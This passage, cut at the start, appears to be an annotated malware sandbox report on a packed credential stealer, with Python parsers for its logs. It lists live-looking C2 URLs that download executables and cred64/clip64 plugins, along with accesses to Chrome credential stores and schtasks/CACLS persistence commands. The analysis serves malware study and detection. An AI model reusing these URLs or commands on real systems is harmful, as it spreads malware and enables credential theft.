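# The twelve request lines from the report above.
REPORT_REQUESTS = [
    "request POST http://193.233.20.15/dF30Hn4m/index.php",
    "request GET http://193.233.20.16/ti/truno.exe",
    "request GET http://62.204.41.245/lebro.exe",
    "request POST http://62.204.41.88/9vdVVVjsw/index.php",
    "request GET http://79.110.62.167/link/agent.exe",
    "request GET http://62.204.41.88/lend/Underglaze.exe",
    "request GET http://193.233.20.15/dF30Hn4m/Plugins/cred64.dll",
    "request GET http://193.233.20.15/dF30Hn4m/Plugins/clip64.dll",
    "request GET http://62.204.41.88/9vdVVVjsw/Plugins/cred64.dll",
    "request GET http://62.204.41.88/9vdVVVjsw/Plugins/clip64.dll",
    "request POST http://193.233.20.15/dF30Hn4m/index.php",
    "request POST http://62.204.41.88/9vdVVVjsw/index.php",
]

if __name__ == "__main__":
    print(suspicious_features(CHECKIN))
    for host, buckets in group_by_host(REPORT_REQUESTS).items():
        print(host, {k: sorted(v) for k, v in buckets.items()})
```

Sets are used per bucket because the report lists the two check-in POSTs twice; the grouping shows that 193.233.20.15 and 62.204.41.88 each serve both a gate and a plugin store, while the other three hosts only serve one executable each.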
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2092
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2092
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2176
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2176
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef4033000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 2097152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000bb0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000d30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b6a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3485000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b6b000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000bb0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000bc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d4000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93d5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93e0c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93e36000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93e10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93d6c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1e16000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe52d000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93e80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93e81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93d7b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93dac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93d7d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
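Everything the sandbox logs in this table is PAGE_EXECUTE_READWRITE: NtProtectVirtualMemory on single pages at addresses where system DLLs are mapped on this VM (0x74xxxxxx / 0x73fxxxxx in the 32-bit processes, 0x7fefxxxxxxxx in PID 2228), and in PID 2228 reserve-then-commit pairs of fresh RWX memory (2 MiB reserved at 0xbb0000, 8 KiB committed at 0xd30000 with the sandbox's heap_dep_bypass flag set). RWX memory alone is a weak signal in a .NET process, whose JIT needs it, so the counts have to be read per process and against the process tree. A second signal hides further down the report: the NtProtectVirtualMemory from PID 3044 goes through handle 0x2c rather than the -1 pseudo-handle, i.e. it changes the protection of 0x402000 in a process other than (or separately opened from) the caller, which is the shape of writing into another process's image. The Python below is an added example, not part of ZeroBOX: it parses the table layout above (API name on its own line, key: value arguments, then the status/return/repeated line) and tallies RWX re-protections, RWX commits and cross-process calls per PID. The sample is four records copied from the report with unused argument lines dropped.

```python
import re
from collections import defaultdict

PAGE_EXECUTE_READWRITE = 0x40                   # the "64" in the protection column
MEM_COMMIT = 0x1000                             # 4096
CURRENT_PROCESS = {0xffffffff, 0xffffffffffffffff}  # -1 pseudo-handle, 32/64-bit
MEMORY_APIS = {"NtProtectVirtualMemory", "NtAllocateVirtualMemory"}
_API_NAME = re.compile(r"[A-Za-z_]\w*")
_STATUS_LINE = re.compile(r"\d+ \d+ \d+")


def parse_api_records(text):
    """Parse the report's layout: an API name alone on a line, then
    'key: value' argument lines, then a 'status return repeated' line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if ":" in line:
            if cur is not None:
                key, _, val = line.partition(":")
                cur[key.strip()] = val.strip()
        elif _API_NAME.fullmatch(line):
            cur = {"api": line}
            records.append(cur)
        elif cur is not None and _STATUS_LINE.fullmatch(line):
            cur["status"], cur["return"], cur["repeated"] = map(int, line.split())
    return records


def _num(val):
    """'64 (PAGE_EXECUTE_READWRITE)' -> 64, '0x74011000' -> 1946292224."""
    tok = val.split()[0]
    return int(tok, 16) if tok.lower().startswith("0x") else int(tok)


def rwx_summary(records):
    """Per PID: cross-process memory calls, RWX re-protections of existing
    pages, RWX commits with their size, and the sandbox's heap_dep_bypass hits."""
    out = defaultdict(lambda: {"cross_process": 0, "rwx_protect": 0,
                               "rwx_commit": 0, "rwx_commit_bytes": 0,
                               "heap_dep_bypass": 0})
    for r in records:
        if r.get("api") not in MEMORY_APIS:
            continue
        pid = int(r["process_identifier"])
        if _num(r.get("process_handle", "0xffffffff")) not in CURRENT_PROCESS:
            out[pid]["cross_process"] += 1
        if _num(r.get("protection", "0")) != PAGE_EXECUTE_READWRITE:
            continue
        s = out[pid]
        if r["api"] == "NtProtectVirtualMemory":
            s["rwx_protect"] += 1
        elif _num(r.get("allocation_type", "0")) & MEM_COMMIT:
            s["rwx_commit"] += 1
            s["rwx_commit_bytes"] += _num(r["region_size"])
        if r.get("heap_dep_bypass") == "1":
            s["heap_dep_bypass"] += 1
    return dict(out)


# Four records copied from the report (unused argument lines removed).
SAMPLE = """\
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2228
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef4033000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 2097152
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000bb0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2228
region_size: 8192
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000d30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3044
heap_dep_bypass: 0
length: 110592
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x00402000
process_handle: 0x0000002c
1 0 0
"""
```

The MEM_RESERVE record is deliberately not counted as a commit: reserving address space is free of content, and only the MEM_COMMIT that follows it can hold code, which is why the 8 KiB commit with heap_dep_bypass set is the line worth dumping.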
description nbveek.exe tried to sleep 128 seconds, actually delayed analysis time by 128 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 2425739
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425739
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425482
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425482
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425275
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425275
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425126
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2425126
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2424477
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2424477
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2424291
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2424291
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2424142
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2424142
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\kFw24bl.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\leW63TH.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\sCf07ZB.exe
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
file C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\dNZ51dd.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\nJM68XE.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\sLP46se.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nXi14fa28.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\rtJ58hE.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\iWr34lU.exe
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\nRK04uJ07.exe
file C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\slV42BL.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Roaming\1000239000\agent.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\eTh66Ma.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nBU16dI.exe
file C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\kQu23BE.exe
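The file list mixes three kinds of artifact: Chrome's credential, cookie and autofill stores under User Data\Default plus Local State (the file that holds the DPAPI-wrapped key those stores are encrypted with), executables extracted into IXP000.TMP to IXP003.TMP, which is the extraction directory pattern of the wextract self-extractor (the "IXP%03d.TMP" string in the first downloaded PE, and the wextract.pdb path of the sample itself), and the clip64.dll/cred64.dll plugins under two %APPDATA% folders. The Python below is an added example, not part of the report, that classifies each path and rebuilds the nesting of extraction stages from the IXP directory numbers. The 14-hex-character pattern for plugin folders is an assumption drawn only from the two directories seen here.

```python
import re
from collections import defaultdict

# Chrome profile files holding saved logins, cookies, autofill and the
# DPAPI-wrapped master key (Local State).
BROWSER_STORES = re.compile(
    r"\\(Login Data|Cookies|Extension Cookies|Web Data|Local State)$", re.I)
# wextract (IExpress) extracts each stage into %TEMP%\IXP<nnn>.TMP
WEXTRACT_STAGE = re.compile(r"\\IXP(\d{3})\.TMP\\", re.I)
# assumption: plugin folders are 14 lowercase hex characters under Roaming
PLUGIN_DLL = re.compile(r"\\AppData\\Roaming\\[0-9a-f]{14}\\\w+\.dll$", re.I)


def classify(path):
    """Label one path from the report's file list."""
    if BROWSER_STORES.search(path):
        return "browser_credential_store"
    m = WEXTRACT_STAGE.search(path)
    if m:
        return "wextract_stage_%d" % int(m.group(1))
    if PLUGIN_DLL.search(path):
        return "plugin_dll"
    if path.lower().endswith(".exe"):
        return "dropped_executable"
    return "other"


def stage_tree(paths):
    """Group extracted executables by wextract stage number, in order."""
    tree = defaultdict(list)
    for p in paths:
        m = WEXTRACT_STAGE.search(p)
        if m:
            tree[int(m.group(1))].append(p.rsplit("\\", 1)[-1])
    return {stage: sorted(names) for stage, names in sorted(tree.items())}


def count_by_class(paths):
    counts = defaultdict(int)
    for p in paths:
        counts[classify(p)] += 1
    return dict(counts)


# The 29 paths from the report's file list above.
REPORT_FILES = [
    r"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data",
    r"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies",
    r"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies",
    r"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies",
    r"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State",
    r"C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe",
    r"C:\Users\test22\AppData\Local\Temp\IXP002.TMP\kFw24bl.exe",
    r"C:\Users\test22\AppData\Local\Temp\IXP002.TMP\leW63TH.exe",
    r"C:\Users\test22\AppData\Local\Temp\IXP002.TMP\sCf07ZB.exe",
    r"C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll",
    r"C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe",
    r"C:\Users\test22\AppData\Local\Temp\IXP003.TMP\dNZ51dd.exe",
    r"C:\Users\test22\AppData\Local\Temp\IXP001.TMP\nJM68XE.exe",
    r"C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll",
    r"C:\Users\test22\AppData\Local\Temp\IXP000.TMP\sLP46se.exe",
    r"C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nXi14fa28.exe",
    r"C:\Users\test22\AppData\Local\Temp\IXP000.TMP\rtJ58hE.exe",
    r"C:\Users\test22\AppData\Local\Temp\IXP003.TMP\iWr34lU.exe",
    r"C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll",
    r"C:\Users\test22\AppData\Local\Temp\IXP002.TMP\nRK04uJ07.exe",
    r"C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe",
    r"C:\Users\test22\AppData\Local\Temp\IXP001.TMP\slV42BL.exe",
    r"C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll",
    r"C:\Users\test22\AppData\Roaming\1000239000\agent.exe",
    r"C:\Users\test22\AppData\Local\Temp\IXP003.TMP\eTh66Ma.exe",
    r"C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nBU16dI.exe",
    r"C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe",
    r"C:\Users\test22\AppData\Local\Temp\IXP003.TMP\kQu23BE.exe",
]

if __name__ == "__main__":
    print(count_by_class(REPORT_FILES))
    print(stage_tree(REPORT_FILES))
```

The stage tree (4, 2, 4, 4 executables in IXP000 to IXP003) is the unpacking chain in the order wextract created the directories; the five executables outside it (mnolyk.exe, truno.exe, lebro.exe, agent.exe, Underglaze.exe) are the copies and downloads the chain produced.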
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "test22:N"&&CACLS "..\9e0894bcc4" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit
